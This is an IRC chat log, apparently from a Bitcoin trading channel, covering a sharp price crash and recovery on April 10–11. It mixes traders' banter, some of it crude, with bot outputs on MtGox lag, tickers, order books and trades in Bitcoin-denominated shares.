lag is 1887.856924 seconds. During this time, light travels 3.7832441382 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 10 22:32:04 ;;bids 0 Apr 10 22:32:04 There are currently 42736435 bitcoins demanded at or over 0.0 USD, worth 6196428.4601 USD in total. | Data vintage: 54.2196 seconds Apr 10 22:32:04 185 bitfloor Apr 10 22:32:14 lol Apr 10 22:32:18 I gotta start calling in favours, get some cash on an exchange, start buying during dips Apr 10 22:32:22 6.2M Apr 10 22:32:57 [HAVELOCK] [SDICE] 12 @ 0.309 = 3.708 BTC [+] Apr 10 22:33:01 [MPEX] [S.DICE] 1600 @ 0.003289 = 5.2624 BTC [+] Apr 10 22:34:08 ;;ticker Apr 10 22:34:09 BTCUSD ticker | Best bid: 130.00000, Best ask: 134.20757, Bid-ask spread: 4.20757, Last trade: 134.20757, 24 hour volume: 115349.53392103, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 214.70630 Apr 10 22:34:34 godzilla fucked the gox hamster Apr 10 22:34:42 maybe someone in the crows that's not mentally retarded manages to notice what service mtgox is delivering for 1mn a month. Apr 10 22:34:47 6.2MM ... that's a big haircut Apr 10 22:35:36 [BTCTC] [ASICMINER-PT] 2 @ 0.7001 = 1.4002 BTC [-] Apr 10 22:35:59 $161 spread for the day. Apr 10 22:36:04 http://jezus.si/graf/dashboards/bitcoin/details/lag/ Apr 10 22:36:20 the distant galaxy is getting closer Apr 10 22:36:32 goxlag down to 6 minutes! Apr 10 22:36:38 ;;ticker Apr 10 22:36:38 BTCUSD ticker | Best bid: 106.10000, Best ask: 149.00000, Bid-ask spread: 42.90000, Last trade: 106.10000, 24 hour volume: 115349.53392103, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 214.70630 Apr 10 22:36:51 coinlab caught up Apr 10 22:36:51 $43 spread Apr 10 22:36:56 nice Apr 10 22:37:02 hopefully we will have some real information soon Apr 10 22:37:26 111 Apr 10 22:37:31 lowest 106 Apr 10 22:38:10 the problem with lag and subsequent huge spreads is that regulators will now have something tangible to point to vis-a-vis protecting the consumers... Apr 10 22:38:32 fucks it up for all of us Apr 10 22:38:54 this is what we signed up for. Apr 10 22:39:20 indeed Apr 10 22:39:46 hard to complain about triple digit BTCs... Apr 10 22:39:59 let's hope it stays that way Apr 10 22:40:03 ;;ticker Apr 10 22:40:05 ;;asks 0 Apr 10 22:40:06 BTCUSD ticker | Best bid: 158.60300, Best ask: 164.78000, Bid-ask spread: 6.17700, Last trade: 158.60300, 24 hour volume: 116200.68527493, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 213.66190 Apr 10 22:40:06 ;;bids 0 Apr 10 22:40:07 There are currently 0 bitcoins offered at or under 0.0 USD, worth 0.0 USD in total. | Data vintage: 72.6251 seconds Apr 10 22:40:08 There are currently 42879652 bitcoins demanded at or over 0.0 USD, worth 6016501.54882 USD in total. | Data vintage: 72.7408 seconds Apr 10 22:40:15 wtf is going on today Apr 10 22:40:23 buying opportunity of the year? Apr 10 22:40:29 ^ Apr 10 22:40:35 yep Apr 10 22:40:49 mtgox replaced their graph - what a joke Apr 10 22:40:57 [HAVELOCK] [HIM] 1 @ 1.089 BTC [+] Apr 10 22:41:05 ;;asks 100 Apr 10 22:41:09 There are currently 0 bitcoins offered at or under 100.0 USD, worth 0.0 USD in total. | Data vintage: 0.5674 seconds Apr 10 22:41:55 6MM bid... was 6.2MM 10 min ago... Apr 10 22:41:57 [HAVELOCK] [HIM] 1 @ 1.09 BTC [+] Apr 10 22:42:02 not a good sign Apr 10 22:42:26 methinks more short-term downside... Apr 10 22:42:46 I'm trying to buy... At 106. :) Apr 10 22:42:55 sell button on Gox isnt even functioning right now, are we just watching all the past orders of the day thru goxlag Apr 10 22:42:56 lets have a lag close to 0 and then assess Apr 10 22:43:14 !ticker m s.mpoe Apr 10 22:43:15 [MPEX:S.MPOE] 1D: 0.00069098 / 0.00070945 / 0.000715 (160086 shares, 113.57 BTC), 7D: 0.00063322 / 0.00069029 / 0.00071514 (2045008 shares, 1,411.66 BTC), 30D: 0.00059218 / 0.00068765 / 0.00077505 (9412586 shares, 6,472.64 BTC) Apr 10 22:43:23 MWASHAHAHAHAHA Apr 10 22:44:02 ;;asks 999999999 Apr 10 22:44:04 There are currently 51776.79 bitcoins offered at or under 999999999.0 USD, worth 2899007691.85 USD in total. | Data vintage: 50.1436 seconds Apr 10 22:44:10 ;;goxlag Apr 10 22:44:11 MtGox lag is 645.385533 seconds. During this time, light travels 1.29334538204 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 10 22:44:21 10 minutes, back to normal? Apr 10 22:44:21 sell button works fine on my pc... interestingly it doesn't work on my mac... Apr 10 22:44:38 ;;bids o Apr 10 22:44:38 Error: 'o' is not a valid floating point number. Apr 10 22:44:43 ;;bids 0 Apr 10 22:44:43 There are currently 42901822 bitcoins demanded at or over 0.0 USD, worth 6983685.78301 USD in total. | Data vintage: 91.2011 seconds Apr 10 22:44:48 ;;asks 300 Apr 10 22:44:48 There are currently 34271.076 bitcoins offered at or under 300.0 USD, worth 7910977.33468 USD in total. | Data vintage: 96.3186 seconds Apr 10 22:45:39 orders coming back onto book - looks like... Apr 10 22:45:45 so quesiton for old time traders.. other than the big selloff in 11 (and the "fork flashcrash") have we ever seen such a dramatic downward price move? Basically 50% as fast as gox could handle it Apr 10 22:46:28 at the time of bitcoinica we did Apr 10 22:46:36 and after GLBSE Apr 10 22:46:43 [BTCTC] [S.DICE-PT] 35 @ 0.00325 = 0.1138 BTC [-] Apr 10 22:46:47 heh.. Apr 10 22:46:50 [BTCTC] [S.DICE-PT] 91 @ 0.003205 = 0.2917 BTC [-] Apr 10 22:47:02 sell button wasnt working for me on gox Apr 10 22:47:30 its okay with me though im good Apr 10 22:47:30 I just got filled at 133.335 Apr 10 22:47:31 [BTCTC] [ASICMINER-PT] 1 @ 0.691 BTC [-] Apr 10 22:47:34 [BTCTC] [ASICMINER-PT] 1 @ 0.69 BTC [-] Apr 10 22:47:35 that was the killing blow for mtgox Apr 10 22:47:37 [BTCTC] [ASICMINER-PT] 3 @ 0.6269 = 1.8807 BTC [-] Apr 10 22:47:50 who in the right mind will ever trade there again? Apr 10 22:47:55 ;;ticker Apr 10 22:47:56 [HAVELOCK] [SDICE] 6 @ 0.3095 = 1.857 BTC [+] Apr 10 22:47:56 BTCUSD ticker | Best bid: 124.00000, Best ask: 130.00000, Bid-ask spread: 6.00000, Last trade: 130.00000, 24 hour volume: 118103.42036012, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 211.81434 Apr 10 22:47:57 [HAVELOCK] [SDICE] 8 @ 0.31 = 2.48 BTC [+] Apr 10 22:47:58 [HAVELOCK] [SDICE] 3 @ 0.31 = 0.93 BTC [+] Apr 10 22:48:01 there we go Apr 10 22:48:08 ;;goxlag Apr 10 22:48:08 MtGox lag is 728.692788 seconds. During this time, light travels 1.4602921883 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 10 22:48:57 [HAVELOCK] [VTX] 1 @ 0.28 BTC [-] Apr 10 22:49:45 bgupta the pirate stuff in august was similar. Apr 10 22:49:56 [HAVELOCK] [SDICE] 1 @ 0.315 BTC [+] Apr 10 22:49:59 but no, glbse didn't even register Apr 10 22:50:05 and bitcoinica was a 20% selloff iirc Apr 10 22:50:19 ;;ticker Apr 10 22:50:20 BTCUSD ticker | Best bid: 120.00000, Best ask: 129.00000, Bid-ask spread: 9.00000, Last trade: 120.00000, 24 hour volume: 118103.42036012, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 211.81434 Apr 10 22:50:22 ;;goxlag Apr 10 22:50:23 MtGox lag is 724.106535 seconds. During this time, light travels 1.45110138864 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 10 22:50:32 pirate weekend was 11.5 to 7 Apr 10 22:50:41 (12:50) < mircea_popescu> but no, glbse didn't even register Apr 10 22:50:44 something like that Apr 10 22:50:50 oops maybe that was pirate stuff i was remembering... Apr 10 22:51:05 actually let me dig it up Apr 10 22:51:10 haha, can't look at bitcoincharts either for the history. thats ded too. Apr 10 22:51:24 http://trilema.com/2012/mpoe-rezultate-august-2012/ Apr 10 22:51:39 crazy language Apr 10 22:51:44 gotcha… wishing it would come back to 50 Apr 10 22:51:44 hurts my brain Apr 10 22:51:49 ~9.5 to ~15.5 and back to ~10.5 Apr 10 22:51:55 so +60% then and -30% Apr 10 22:52:11 can't even pronounce cumparari with out laughing Apr 10 22:52:12 this was more like +150% and back down 50% Apr 10 22:52:19 hehe Apr 10 22:52:21 got it Apr 10 22:52:58 should be interesting to graph the bottoms of all 30%+ drops.. Apr 10 22:53:02 ;;ticker Apr 10 22:53:02 BTCUSD ticker | Best bid: 131.65510, Best ask: 139.00000, Bid-ask spread: 7.34490, Last trade: 131.00000, 24 hour volume: 117610.35167010, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 210.73940 Apr 10 22:53:12 I have to run. be back later. Apr 10 22:53:15 gribble seems to still be able to connect to gox Apr 10 22:53:57 ;;seen jurov Apr 10 22:53:57 jurov was last seen in #bitcoin-assets 20 hours, 34 minutes, and 22 seconds ago: mircea_popescu, withdrawals pls Apr 10 22:54:24 ;;goxlag Apr 10 22:54:28 ;;ticker Apr 10 22:54:39 MtGox lag is 774.288923 seconds. During this time, light travels 1.55166633232 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 10 22:54:55 BTCUSD ticker | Best bid: 127.00000, Best ask: 134.00000, Bid-ask spread: 7.00000, Last trade: 134.00000, 24 hour volume: 117610.35167010, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 210.73940 Apr 10 22:54:57 [HAVELOCK] [SDICE] 11 @ 0.31 = 3.41 BTC [-] Apr 10 22:55:56 [HAVELOCK] [HIM] 3 @ 1.09 = 3.27 BTC [+] Apr 10 22:56:59 ;;ticker Apr 10 22:57:00 BTCUSD ticker | Best bid: 127.21951, Best ask: 143.06527, Bid-ask spread: 15.84576, Last trade: 149.99999, 24 hour volume: 118890.16565084, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 209.86283 Apr 10 22:58:17 poor bitcoinity... so behind. Apr 10 22:58:17 connected users: 13134 Apr 10 22:58:56 [HAVELOCK] [SDICE] 3 @ 0.315 = 0.945 BTC [+] Apr 10 22:59:57 [HAVELOCK] [SDICE] 1 @ 0.3331 BTC [+] Apr 10 23:00:56 [HAVELOCK] [SDICE] 1 @ 0.3331 BTC [+] Apr 10 23:03:05 ;;goxlag Apr 10 23:03:06 [MPEX] [S.DICE] 100 @ 0.003289 = 0.3289 BTC [+] Apr 10 23:03:06 MtGox lag is 815.718806 seconds. During this time, light travels 1.63469135398 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 10 23:03:07 ;;ticker Apr 10 23:03:08 BTCUSD ticker | Best bid: 131.13000, Best ask: 133.00000, Bid-ask spread: 1.87000, Last trade: 133.00000, 24 hour volume: 122718.37665676, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 207.67786 Apr 10 23:03:29 why all the sdice buys? Apr 10 23:03:33 did i miss some news? Apr 10 23:03:54 BTC price dropped Apr 10 23:04:26 probably bullish for S.DICE BTC valuation Apr 10 23:04:55 nah there hasnt been any correlation shown in btc/usd price and s.dice profits/bets Apr 10 23:04:57 Looks like the bottom is in. Apr 10 23:05:08 pigeons: I'm not saying there has been. Apr 10 23:05:09 but s.dice should have a good yield this month Apr 10 23:05:09 pigeons i disagree Apr 10 23:05:15 but that is why people just bought some Apr 10 23:05:22 ThickAsThieves: to disagree just show it to me Apr 10 23:06:13 you think we'll see another 15k profit month at $250 BTC/USD anytime soon? Apr 10 23:06:31 I kinda like goxlag. If you know what you are doing, you can profit from it I think. Apr 10 23:06:40 i asked for a correlation seen in the past, not "do you think we'll see x anytime soon" Apr 10 23:07:20 ;;ticker Apr 10 23:07:23 i think i gotta go have a drink.. Apr 10 23:07:23 BTCUSD ticker | Best bid: 129.54194, Best ask: 140.00000, Bid-ask spread: 10.45806, Last trade: 129.00000, 24 hour volume: 123531.05189806, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 207.12602 Apr 10 23:07:30 i hear you pigeons Apr 10 23:07:32 sooo... back to 130 ? Apr 10 23:07:35 lemme see what i can dig up Apr 10 23:07:36 this would be a scotch day Apr 10 23:07:38 yup Apr 10 23:07:41 ready to go again ? Apr 10 23:07:59 Got filled at 133.335, but my 121.25 is languishing on the book Apr 10 23:08:02 Will thos 260 options drop in price I wonder Apr 10 23:08:19 surpised that it didn't snap back harder yet. Apr 10 23:08:32 [BTCTC] [GOLD] 3 @ 0.12381 = 0.3714 BTC [+] Apr 10 23:09:00 Im not, Mtgox is the issue. Apr 10 23:09:06 oh sweet. Filled at 121 Apr 10 23:09:16 You would think they would have fixed that by now. Apr 10 23:09:24 I'm getting buys filled at 123 and sells filled at 145 simulatneously... Apr 10 23:09:44 Gotta love gox lag. Apr 10 23:10:18 damn, might be too late to get money in Apr 10 23:10:33 err seems like the right time Apr 10 23:11:32 ;;ticker Apr 10 23:11:34 BTCUSD ticker | Best bid: 139.94146, Best ask: 143.85158, Bid-ask spread: 3.91012, Last trade: 148.00000, 24 hour volume: 125333.65136459, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 205.77171 Apr 10 23:11:57 ;;goxlag Apr 10 23:11:58 MtGox lag is 636.652305 seconds. During this time, light travels 1.27584409091 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 10 23:13:18 [BTCTC] [GOLD] 1 @ 0.12381 BTC [+] Apr 10 23:13:20 i'm seeing like 105 ? Apr 10 23:13:22 up up and away... Back to 200. Apr 10 23:13:28 What is the fastest way to get money in anyhow Apr 10 23:13:29 mircea_popescu: bitcoinity is way behind Apr 10 23:13:41 I have never found a good way other than dealing with OTC Apr 10 23:13:41 moddy is on it Apr 10 23:13:51 how do you know ? Apr 10 23:13:54 btc-e was at 170 a minute ago... Apr 10 23:13:58 USD Apr 10 23:13:59 I am watching everything at once Apr 10 23:14:12 IRC is best, then moody Apr 10 23:14:15 http://clarkmoody.com/ btw Apr 10 23:14:29 "I'm a 25 year old guy from College Station, Texas. I am married to the most wonderful woman in the world, and I love Jesus. I'm a huge fan of creative brainstorming sessions, unmanned aerial vehicles, geeky microcontroller electronics projects, and games of disc golf with friends." Apr 10 23:14:30 'm a 25 year old guy from College Station, Texas. I am married to the most wonderful woman in the world, and I love Jesus. Apr 10 23:14:45 old. Apr 10 23:14:56 Yeah, he nolonger loves jesus Apr 10 23:15:04 mebbe dat too Apr 10 23:15:06 pledge his faith to satoshi Apr 10 23:15:17 cyber christ. Apr 10 23:15:23 lol Apr 10 23:15:25 or what was it? Apr 10 23:15:26 In Satoshi We Trust Apr 10 23:15:29 in love with jesus Apr 10 23:15:49 which is worse, disc golf or jesus? Apr 10 23:15:54 ;;ticker Apr 10 23:15:56 BTCUSD ticker | Best bid: 140.40075, Best ask: 149.00000, Bid-ask spread: 8.59925, Last trade: 140.40075, 24 hour volume: 127462.62102141, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 204.43302 Apr 10 23:15:58 pigeons: good question Apr 10 23:15:59 ;;goxlag Apr 10 23:16:00 MtGox lag is 596.95149 seconds. During this time, light travels 1.19628410216 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 10 23:16:06 back to 10min eh Apr 10 23:16:14 jesus Apr 10 23:16:24 whats wrong with disc golf? Apr 10 23:16:33 its more boring than real gold Apr 10 23:16:35 *golf Apr 10 23:16:36 it's like ultimate frisbee if you aren't good at running Apr 10 23:16:54 and less drinking Apr 10 23:17:10 Bugpowda: aint no body got time for that Apr 10 23:17:20 maybbe its not over yet... Apr 10 23:17:22 hey now.... Apr 10 23:18:04 haha. Apr 10 23:18:05 meh... got my bids... ttyl. time to catch up on work Apr 10 23:19:34 :( Apr 10 23:19:57 [HAVELOCK] [VTX] 29 @ 0.28 = 8.12 BTC [-] Apr 10 23:20:57 [HAVELOCK] [HIM] 2 @ 1.09 = 2.18 BTC [+] Apr 10 23:24:57 [HAVELOCK] [VTX] 10 @ 0.28 = 2.8 BTC [-] Apr 10 23:25:54 ;;ticker Apr 10 23:25:55 BTCUSD ticker | Best bid: 149.00000, Best ask: 149.99000, Bid-ask spread: 0.99000, Last trade: 149.00000, 24 hour volume: 131603.19396295, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 201.95839 Apr 10 23:25:58 [HAVELOCK] [VTX] 26 @ 0.2933 = 7.6258 BTC [+] Apr 10 23:27:57 [HAVELOCK] [HIM] 4 @ 1.09 = 4.36 BTC [+] Apr 10 23:28:37 still over 500s of lag... jeeze Apr 10 23:28:41 [BTCTC] [GOLD] 1 @ 0.12381 BTC [+] Apr 10 23:28:55 [HAVELOCK] [SDICE] 42 @ 0.31 = 13.02 BTC [-] Apr 10 23:30:26 yawn Apr 10 23:34:19 I feel for the fucker who bought at 266, and sold at 105 Apr 10 23:34:26 could be the same guy Apr 10 23:34:32 lol Apr 10 23:34:42 the old buy high sell low Apr 10 23:35:21 i cant belive i snatched a few 78 on stamp today Apr 10 23:35:27 nice Apr 10 23:35:37 china will rescue us ;) Apr 10 23:35:52 ;;ticker Apr 10 23:35:56 BTCUSD ticker | Best bid: 151.00000, Best ask: 160.00000, Bid-ask spread: 9.00000, Last trade: 160.00000, 24 hour volume: 135121.67227778, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 200.43051 Apr 10 23:35:57 ;;goxlag Apr 10 23:35:57 MtGox lag is 438.092694 seconds. During this time, light travels 0.877932853646 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 10 23:36:00 im to desensitized to this Apr 10 23:36:14 i sold some, so i cant lose Apr 10 23:36:15 lol Apr 10 23:36:28 oh i tought you mean the goxlag. lol Apr 10 23:36:35 that's becoming way too common Apr 10 23:36:49 50% wednesday todaaaaaaaay Apr 10 23:36:51 actually Apr 10 23:36:59 this could be a present for my cakeday Apr 10 23:37:08 bowjob fear seller ^^ Apr 10 23:37:09 it's a curse... Apr 10 23:37:15 we're in the bulltrap now Apr 10 23:37:22 It all makes sense. i had my shirt backwards Apr 10 23:38:28 lol Apr 10 23:38:33 this was orchestrated Apr 10 23:38:43 if anything, i think they found their plan a success Apr 10 23:38:46 so expect more Apr 10 23:38:53 and expect overall MORE buying Apr 10 23:38:59 just my opinion Apr 10 23:39:09 but the whole fun of bitcoin is how easy it is to manipulate the market Apr 10 23:39:37 ;;goxlag Apr 10 23:39:38 MtGox lag is 518.343624 seconds. During this time, light travels 1.03875481883 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 10 23:40:39 [BTCTC] [GOLD] 1 @ 0.1238 BTC [-] Apr 10 23:41:31 ;;bids 0 Apr 10 23:41:33 There are currently 42635939 bitcoins demanded at or over 0.0 USD, worth 11082243.7308 USD in total. | Data vintage: 9.3239 seconds Apr 10 23:41:38 ;;goxlag Apr 10 23:41:42 ;;goxlag Apr 10 23:41:43 MtGox lag is 503.166845 seconds. During this time, light travels 1.00834072364 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 10 23:41:51 ;;asks 300 Apr 10 23:41:51 There are currently 35956.287 bitcoins offered at or under 300.0 USD, worth 8469650.61604 USD in total. | Data vintage: 28.7736 seconds Apr 10 23:45:31 maybe ian will turn legit? Apr 10 23:45:55 cavirtex back to 200 Apr 10 23:46:42 rikur where are you brah Apr 10 23:48:16 ;;ticker --last Apr 10 23:48:17 185.00000 Apr 10 23:48:21 that works Apr 10 23:48:23 bitcoinforecast reports -111 short term, 407 long term. nbd. Apr 10 23:49:52 ;;goxlag Apr 10 23:49:55 MtGox lag is 534.079881 seconds. During this time, light travels 1.07029010167 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 10 23:50:02 its the goxlag thats hurting it Apr 10 23:50:03 Bowjob: yeah I missed the dip Apr 10 23:50:48 hopefully this forces people off of gox Apr 10 23:51:19 i was asleep Apr 10 23:51:59 I should have bought moar Apr 10 23:52:35 6:52] <+amphipod> Apr10 18:39:01 bitstamp x65 384.5677 @ 89.57359346 USD!!! Apr 10 23:52:42 seems that gox is at175 Apr 10 23:52:47 according to bitcoinstore Apr 10 23:53:08 yeah thsose 80$ btc were tasty Apr 10 23:53:21 asshole Apr 10 23:53:28 just jealous Apr 10 23:53:39 :) Apr 10 23:53:42 kakobrekla: you really got $80? Apr 10 23:53:46 NICE Apr 10 23:53:51 i bought at 200 and 150 too on the way down if it makes you feel any better Apr 10 23:53:59 !ticker Apr 10 23:54:00 ya Apr 10 23:54:00 Hell, ain't we about more fucked than a whore at closin' time, huh? Apr 10 23:54:07 ;;ticker Apr 10 23:54:07 damn Apr 10 23:54:08 BTCUSD ticker | Best bid: 179.00000, Best ask: 189.00000, Bid-ask spread: 10.00000, Last trade: 179.00000, 24 hour volume: 141513.64558635, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 198.84086 Apr 10 23:54:18 dump and pump is dangerous, so I'm sort of glad I missed it.. Apr 10 23:54:31 ;;lag Apr 10 23:54:31 Error: "lag" is not a valid command. Apr 10 23:54:34 you win some you lose some Apr 10 23:54:35 ;;goxlag Apr 10 23:54:35 MtGox lag is 581.765251 seconds. During this time, light travels 1.16585104924 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 10 23:54:40 oh well, it should be back to 220 today Apr 10 23:54:54 i WANT to like the price recovering so quickly, but I worry that it puts us at the same exact exposure we were at this morning Apr 10 23:55:01 Rikur, lets buy $100 hotdogs for Apr 10 23:55:04 .4 BTC? Apr 10 23:55:05 :D Apr 10 23:55:05 i huge price jump is asking for a double dip Apr 10 23:55:11 no amtter when it happens Apr 10 23:55:16 ^^^ Apr 10 23:55:28 ^^ Apr 10 23:55:30 agree Apr 10 23:55:38 So my open bid @ 64 might have a chance?! haha Apr 10 23:55:39 Bowjob: hehe, I'll wait a day or two to get hot dogs for -50% :p Apr 10 23:55:55 TomServo: nope Apr 10 23:56:19 ugh... Apr 10 23:56:25 bitcoin mania is relentless Apr 10 23:58:58 pigeons you still there Apr 10 23:59:19 i have proof ready that SDICE betting is affected by USD/BTC rate Apr 10 23:59:27 where is that goxlag meme pic Apr 10 23:59:28 urlpls Apr 11 00:00:29 ;;ticker Apr 11 00:00:32 BTCUSD ticker | Best bid: 184.46829, Best ask: 190.00000, Bid-ask spread: 5.53171, Last trade: 180.44100, 24 hour volume: 143120.57221572, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 198.68487 Apr 11 00:00:40 ;;bc,24hprc Apr 11 00:00:41 203.75 Apr 11 00:00:51 why...oh Apr 11 00:00:53 OH Apr 11 00:00:57 !ticker m S.MPOE Apr 11 00:00:59 [MPEX:S.MPOE] 1D: 0.00069098 / 0.00070945 / 0.000715 (160086 shares, 113.57 BTC), 7D: 0.00063322 / 0.00069029 / 0.00071514 (2045008 shares, 1,411.66 BTC), 30D: 0.00059218 / 0.00068765 / 0.00077505 (9412586 shares, 6,472.64 BTC) Apr 11 00:01:03 ah ha Apr 11 00:01:28 The following is the amount of "BTC In" for SatoshiDice.com for the previous four 4-week periods: Apr 11 00:01:31 Jan 16th 1992532 Apr 11 00:01:31 Feb 13th 1174083 Apr 11 00:01:31 Mar 13th 240936 Apr 11 00:01:31 Apr 9th 121371 Apr 11 00:01:41 see a trend? Apr 11 00:01:53 no Apr 11 00:02:03 Jan 16th 1992532 Apr 11 00:02:03 Feb 13th 1174083 Apr 11 00:02:03 Mar 13th 240936 Apr 11 00:02:03 Apr 9th 121371 Apr 11 00:02:22 better than when you were arguing nekkid Apr 11 00:02:53 price goes up, betting goes down. Apr 11 00:02:53 half quarter half Apr 11 00:02:56 ;;asks 250 Apr 11 00:02:56 There are currently 14360.402 bitcoins offered at or under 250.0 USD, worth 3143389.44241 USD in total. | Data vintage: 93.6624 seconds Apr 11 00:02:57 SDICE will rise! Apr 11 00:03:06 ;;bids 130 Apr 11 00:03:07 There are currently 16797.458 bitcoins demanded at or over 130.0 USD, worth 2542314.64368 USD in total. | Data vintage: 103.5214 seconds Apr 11 00:04:19 mircea_popescu ah the BCB chairman arrives Apr 11 00:04:36 feel free to verify, i was doing like 5 things at once (as usual) when i did the math Apr 11 00:04:48 ;;goxlag Apr 11 00:04:49 MtGox lag is 421.129856 seconds. During this time, light travels 0.843939516219 AU. You could have sent a bitcoin from the Sun to Venus (0.72 AU). Apr 11 00:04:56 MPOE will rise Apr 11 00:05:16 ;;ticker Apr 11 00:05:20 BTCUSD ticker | Best bid: 190.00000, Best ask: 198.90000, Bid-ask spread: 8.90000, Last trade: 198.90000, 24 hour volume: 144954.06230218, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 198.50794 Apr 11 00:05:39 [BTCTC] [GOLD] 1 @ 0.1238 BTC [-] Apr 11 00:05:57 [HAVELOCK] [VTX] 1 @ 0.25500001 BTC [-] Apr 11 00:06:47 !ticker h klim Apr 11 00:06:49 Good morning, may you serve the Lord, and may His holy dominion guide you through your dismal life. Apr 11 00:06:56 !ticker h kim Apr 11 00:06:57 It says some pelt-wearin' trapper, some stinkin' bean-suckin' possum skinner, he's gonna collect that reward money. Apr 11 00:07:01 !ticker h him Apr 11 00:07:02 [HAVELOCK:HIM] 1D: 0.75000001 / 1.10759322 / 1.20000000 (59 shares, 65.34800001 BTC), 7D: 0.75000001 / 1.52179593 / 1.93000000 (221 shares, 336.31690011 BTC), 30D: 0.75000001 / 1.77008474 / 2.08000000 (806 shares, 1426.68829841 BTC) Apr 11 00:07:27 !ticker h vtx Apr 11 00:07:28 [HAVELOCK:VTX] 1D: 0.18000000 / 0.25133697 / 0.30000000 (515 shares, 129.43853857 BTC), 7D: 0.18000000 / 0.30180003 / 0.47000000 (1667 shares, 503.10064405 BTC), 30D: 0.18000000 / 0.41931029 / 0.79900000 (14627 shares, 6133.25156457 BTC) Apr 11 00:08:59 whoa him went to .75 ?! Apr 11 00:09:39 is that the one that buys BFLs? Apr 11 00:09:51 iirc. Apr 11 00:10:10 yea i warned them too Apr 11 00:10:41 ;;goxlag Apr 11 00:10:41 MtGox lag is 40.02897 seconds. During this time, light travels 0.0802176076933 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). Apr 11 00:10:58 I wrote them an email explaining with the non-linear increase in difficulty and them not having a contingency plan for BFL labs non-delivery, there would be a run on the stock as dividends don't increase over time. Apr 11 00:11:11 Looks like people pulled out and went to ASICMINER :\ Apr 11 00:11:19 [BTCTC] [S.DICE-PT] 1 @ 0.003205 BTC [-] Apr 11 00:11:37 [BTCTC] [S.DICE-PT] 68 @ 0.003205 = 0.2179 BTC [-] Apr 11 00:11:41 " ‏@stacyherbert 6m Apr 11 00:11:41 My friend tried buying 100 bitcoin tonight at $220, then at $200, then at $175. Mt.Gox would ONLY fill it at $140." Apr 11 00:11:42 so much win Apr 11 00:11:57 lol\ Apr 11 00:12:05 trading with the past? Apr 11 00:12:08 ;;goxlag Apr 11 00:12:09 MtGox lag is 94.566716 seconds. During this time, light travels 0.189510640042 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 11 00:12:14 it got worse Apr 11 00:12:16 ;;ticker Apr 11 00:12:16 BTCUSD ticker | Best bid: 195.12195, Best ask: 198.40000, Bid-ask spread: 3.27805, Last trade: 198.40000, 24 hour volume: 146479.39685151, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 198.18480 Apr 11 00:12:29 amazing Apr 11 00:12:39 was it the goxlag that caused it? or is shit going to get worse? Apr 11 00:12:54 imo another big dip to take profit is totally possible Apr 11 00:13:06 imo anything is possible Apr 11 00:13:15 imo you are correct Apr 11 00:13:18 totally. Apr 11 00:13:29 over 200 Apr 11 00:13:40 ;;ticker --last Apr 11 00:13:41 198.97000 Apr 11 00:13:49 ;;ticker Apr 11 00:13:50 BTCUSD ticker | Best bid: 199.98000, Best ask: 203.00000, Bid-ask spread: 3.02000, Last trade: 203.00000, 24 hour volume: 146479.39685151, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 198.18480 Apr 11 00:13:55 [HAVELOCK] [VTX] 4 @ 0.25 = 1 BTC [-] Apr 11 00:14:34 I think another opportunity to sell... Apr 11 00:14:40 seriously back to $200 already? wow Apr 11 00:14:43 yeah for sure Apr 11 00:14:44 [BTCTC] [GSDPT] 1 @ 0.00304 BTC [+] Apr 11 00:14:48 time to dump Apr 11 00:14:52 yep Apr 11 00:14:53 probably will be too slpw Apr 11 00:14:56 too slow Apr 11 00:14:56 lets dump fiat Apr 11 00:15:03 due to gox lag Apr 11 00:15:30 it usually oscillates 2-3 cycles of decreasing amplitude after big moves Apr 11 00:16:47 !ticker m ^OIX Apr 11 00:16:49 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 123.50099848 / 224.19815089 / 226.07089967 (13815 shares, 2,358.38 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 11 00:17:56 [HAVELOCK] [VTX] 10 @ 0.2385 = 2.385 BTC [-] Apr 11 00:18:37 ;;goxlag Apr 11 00:18:40 MtGox lag is 171.222393 seconds. During this time, light travels 0.343127758471 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one month (0.2988 AU). Apr 11 00:18:46 even goxlag is lagging Apr 11 00:19:22 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Apr 11 00:19:24 hehe Apr 11 00:20:07 where are our options... Apr 11 00:20:16 